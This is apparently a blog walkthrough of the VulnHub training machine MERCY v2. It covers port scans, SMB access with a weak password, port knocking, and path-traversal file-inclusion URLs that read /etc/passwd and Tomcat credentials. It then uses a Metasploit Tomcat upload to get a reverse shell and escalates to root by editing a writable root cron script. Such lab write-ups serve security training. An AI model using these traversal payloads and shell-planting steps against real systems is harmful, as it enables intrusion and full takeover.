MERCY v2 Writeup

MERCY v2 Writeup - VulnHub

Welcome to the writeup of MERCY, a machine dedicated to Offensive Security for the PWK course, and to a great friend of the author.

Pedro Mariano

4 min

Welcome to the writeup of MERCY v2, a machine that can be found on VulnHub.

Name: digitalworld.local: MERCY v2
Date release: 28 Dec 2018
Author: Donavan
Series: digitalworld.local
Description: MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.

This machine was deployed using VirtualBox with "Host-Only Adapter" configuration.

NMAP


          
            nmap -v -sSV -p 22,53,80,110,139,143,445,993,995,8080 -Pn 192.168.56.101 -T4 -oA nmap/sSV
          
          
            
          
          
            PORT     STATE    SERVICE     VERSION
          
          
            22/tcp   filtered ssh
          
          
            53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
          
          
            80/tcp   filtered http
          
          
            110/tcp  open     pop3        Dovecot pop3d
          
          
            139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
          
          
            143/tcp  open     imap        Dovecot imapd (Ubuntu)
          
          
            445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
          
          
            993/tcp  open     ssl/imap    Dovecot imapd (Ubuntu)
          
          
            995/tcp  open     ssl/pop3    Dovecot pop3d
          
          
            8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
          
          
            MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
          
          
            Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Identified a web page on port 8080 (http://192.168.56.101:8080/) running Apache Tomcat.

Used the Gobuster tool to find some interesting directories:

GOBUSTER


          
            gobuster dir -u http://192.168.56.101:8080/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
          
          
            
          
          
            ===============================================================
          
          
            http://192.168.56.101:8080/docs                 (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/docs/]
          
          
            http://192.168.56.101:8080/examples             (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/examples/]
          
          
            http://192.168.56.101:8080/manager              (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/manager/] 
          
          
            http://192.168.56.101:8080/robots.txt           (Status: 200) [Size: 45]                                          
          
          
                                                                                                                              
          
          
            ===============================================================

In the /robots.txt directory it was possible to find the page /tryharder/tryharder where is a hash in base64, containing the following message:

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

At this point, this found did not mean... but any information is important!

Continuing with the enumeration it was possible to identify some shared folder through SMB.

But has nothing to get as "anonymous" user...

With enum4linux tool was possible to enumerate some users:


          
            enum4linux -a 192.168.56.101
          
          
            
          
          
            [...]
          
          
            S-1-22-1-1000 Unix User\pleadformercy (Local User)
          
          
            S-1-22-1-1001 Unix User\qiu (Local User)
          
          
            S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
          
          
            S-1-22-1-1003 Unix User\fluffy (Local User)

The qiu user caught my attention because of the existence of an SMB directory with this name.

Following the "little poem" from /tryharder/tryharder (I think that this warning didn't work haha D:) I get access to qiu SMB directory using the following credentials:

qiu:password

And with that I managed to log into SMB and find some important folders and files.

After downloading the archives and reading them I could find an amazing information in the .private/config file. It's about a "port knocking" configuration that allow you to enable and disable the following ports: 22,80.

As initially listed in the first scan, the ports 22 and 80 was filtered. Doing a port knocking following the sequences of the ports mentioned in the print above (.private/config), we will be able to change the status of these ports and interact with them. - Particularly, it's a pretty cool function.

Used hping3 to explore this configuration:


          
            hping3 -S -p 159 -c 1 192.168.56.101; hping3 -S -p 27391 -c 1 192.168.56.101; hping3 -S -p 4 -c 1 192.168.56.101
          
          
            
          
          
            hping3 -S -p 17301 -c 1 192.168.56.101; hping3 -S -p 28504 -c 1 192.168.56.101; hping3 -S -p 9999 -c 1 192.168.56.101

After that the ports were open.


          
            nmap -v -sSV -p 22,80 -Pn 192.168.56.101 -T4 -oN nmap/sSV-APKnock
          
          
            
          
          
            PORT   STATE SERVICE VERSION
          
          
            22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
          
          
            80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
          
          
            MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
          
          
            Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Accessing the web page on port 80 a loving message is observed o.o

Performed a brute-force again with Gobuster I have found 2 interesting pages:


          
            gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
          
          
            
          
          
            ===============================================================
          
          
            http://192.168.56.101/.htpasswd            (Status: 403) [Size: 290]
          
          
            http://192.168.56.101/.htaccess            (Status: 403) [Size: 290]
          
          
            http://192.168.56.101/robots.txt           (Status: 200) [Size: 50] 
          
          
            http://192.168.56.101/server-status        (Status: 403) [Size: 294]
          
          
            http://192.168.56.101/time                 (Status: 200) [Size: 79] 
          
          
                                                                                
          
          
            ===============================================================

Below is a print of the pages:

/time

Is it information brought directly from the system?

/robots.txt

As we can see at /robots.txt, we have 2 more pages:

/mercy

/nomercy

The last is a "static source code analyser for vulnerabilities in PHP web applications" and contains public exploit that explore the "Multiple Local File Inclusions" vulnerability that exists in RIPS 0.53.

Through this vulnerability I gained access to the /etc/passwd file and confirmed the vulnerability, taking advantage to confirm existing users :p

http://192.168.56.101/nomercy/windows/code.php?file=../../../../../../../etc/passwd

As identified in beginning, there is a Tomcat server and on its default index page it was possible to view the path installation. Then used LFI vulnerability to get credentials from Tomat server that is normally in the file /tomcat-users.xml.

http://192.168.56.101/nomercy/windows/code.php?file=../../../../../var/lib/tomcat7/conf/tomcat-users.xml

With these credentials I logged into the Tomcat as an administrator and with this permissions its possible to upload and edit everything.

To get a reverse shell we can use the upload function in Tomcat Manager but we can use the Metasploit for a easy way...

Used the exploit/multi/http/tomcat_mgr_upload to explore and establish a reverse shell.

set HttpPassword heartbreakisinevitable
set HttpUsername thisisasuperduperlonguser
set RHOSTS 192.168.56.101
set RPORT 8080
set LHOST 192.168.56.104

Spoiler → thisisasuperduperlonguser home is troll D:

Privilege Escalation

Not many directions and some users /home directories, the credentials found at /tomcat-users.xml worked to switch to fluffy user: fluffy:freakishfluffybunny - but an interactive shell was needed and the python was used for that.

Now as fluffy user and at /home there are secrets and interesting things: /.private/secrets


          
            fluffy@MERCY:~/.private/secrets$ ls -la
          
          
            ls -la
          
          
            total 20
          
          
            drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
          
          
            drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
          
          
            -rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
          
          
            -rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
          
          
            -rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock


          
            fluffy@MERCY:~/.private/secrets$ cat timeclock
          
          
            cat timeclock
          
          
            #!/bin/bash
          
          
            
          
          
            now=$(date)
          
          
            echo "The system time is: $now." > ../../../../../var/www/html/time
          
          
            echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
          
          
            chown www-data:www-data ../../../../../var/www/html/time

The content of timeclock file seems like the /time page that we saw before what appears to run automatically, are owned by root and have full permissions... interesting, isn't it?

So a bash command was added to the file to stablish a reverse shell with my machine.

But before, the port 6666 was opened by netcat to wait for this connection.

After netcat was configured and the file changed, the script was run again and the reverse shell was successfully established.

NICE! PWNED!!

Finally we got root and now we compromised the whole machine!

Conclusion

This is a really good machine to practice and exercise some base skills and yet it can make you beg for MERCY xD. I recommend you to download it and try it too o/ - if you haven't already...

But of course, I couldn't forget the author's considerations found in the /root directory: author-secret.txt and proof.txt files.


          
            root@MERCY:~# cat author-secret.txt
          
          
            cat author-secret.txt
          
          
            Hi! Congratulations on being able to root MERCY.
          
          
            
          
          
            The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.
          
          
            
          
          
            The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.
          
          
            
          
          
            The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)
          
          
            
          
          
            You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!
          
          
            
          
          
            Congratulations, once again, for you TRIED HARDER!
          
          
            
          
          
            Regards,
          
          
            The Author
          
          
            
          
          
            
          
          
            root@MERCY:~# cat proof.txt
          
          
            cat proof.txt
          
          
            Congratulations on rooting MERCY. :-)

Thanks for reading and feel free to pingback a coffee ;D

naP0

Deixe seu Pingback

Learn

Support

More Options